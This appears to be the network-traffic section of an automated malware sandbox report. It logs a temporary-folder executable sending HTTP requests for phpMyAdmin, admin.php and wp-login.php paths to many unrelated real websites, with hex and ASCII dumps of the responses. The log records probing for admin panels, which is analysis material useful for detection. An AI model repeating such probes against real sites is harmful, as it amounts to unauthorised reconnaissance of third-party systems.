                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:55.000415087 CET1286INData Raw: 31 61 35 64 0d 0a 28 d0 b5 a0 52 d3 2b 42 13 54 ca 8c 2c 11 95 a8 ce b6 d0 de 8d 86 74 81 ac 65 9d 11 0f 67 7c 30 75 de 28 bb 8c b5 4a 4a 07 01 94 17 dd 65 2a ac 7a a6 e4 e9 aa c9 b6 5c 0b 07 3d 7c 45 b5 6a 5e 1e 3d 1b ac b3 df 8f 5a be 76 7a 44
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1a5d(R+BT,teg|0u(JJe*z\=|Ej^=ZvzD{Z\ebRv3SgcC_.,;uROWIc$z1/WMaR' z|;&)YRD71#cSMcC8!xAeqwh@0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                305192.168.2.657922104.21.60.18880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.723434925 CET173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: netizion.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.850167990 CET667INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:54 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:54 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://netizion.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2q5xXCRtc4LyFj5cZCnD679Uuqc3KPIW3evm5CC4hs0YZcdPO%2F4rSskcl2dmQyVWt44Xe9rmanl9yHDy%2Bd1m%2FCmq55hUnHKjV64Es7JiEtgSE40%2BYgPD1tylZfFAHGs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb845d5b2447-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                306192.168.2.657929172.67.148.12480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.723510981 CET170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: loopex.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.850372076 CET656INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:54 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:54 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://loopex.io/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cVvDxceun1W2d9XWGVJRThGbl338QTMo03tqmcOvb0JsguOVxBbhHA02buI37aK7OAwsGRoq1EuH%2F30HzLI24HkPlCnPlmcMjSWp7q%2BFMHNZg94m0O82KoJkbzg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb84595469fb-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                307192.168.2.65789744.233.131.11580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.723680019 CET181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: cloud.simplify3d.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.895514011 CET386INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:54 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://cloud.simplify3d.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                308192.168.2.657900200.108.110.16480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.723695040 CET189OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: midetuvelocidad.claro.com.pe
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.908144951 CET419INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=45
                                                                                                                                                                                                                                                                                                                                                                Location: https://midetuvelocidad.claro.com.pe/phpmyadmin/?
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                309192.168.2.65793113.248.169.4880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.723767042 CET179OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: secure.vexcorp.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:55.048665047 CET1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:54 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:30:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834fa-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_A8zp6X3e5UjxX3ZIdT5DCnyb/btbWP7Oq3lYdD6prZ/FzoJByLpPMsnxK+oSHC+tF5ZlAfCQnkXoFp0JUK8kDA
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:55.256143093 CET1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:54 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:30:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834fa-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_A8zp6X3e5UjxX3ZIdT5DCnyb/btbWP7Oq3lYdD6prZ/FzoJByLpPMsnxK+oSHC+tF5ZlAfCQnkXoFp0JUK8kDA
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                310192.168.2.657376164.100.128.1580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:55.699749947 CET178OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: upsconline.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:56.088303089 CET141INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://upsconline.nic.in/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                311192.168.2.65696154.71.181.16080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:58.593199968 CET180OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucivirtual.uci.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:58.764980078 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:58.764998913 CET97INData Raw: 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                312192.168.2.656373124.237.208.3780524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:58.593204021 CET175OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pan.baidu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:58.983494997 CET1280INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
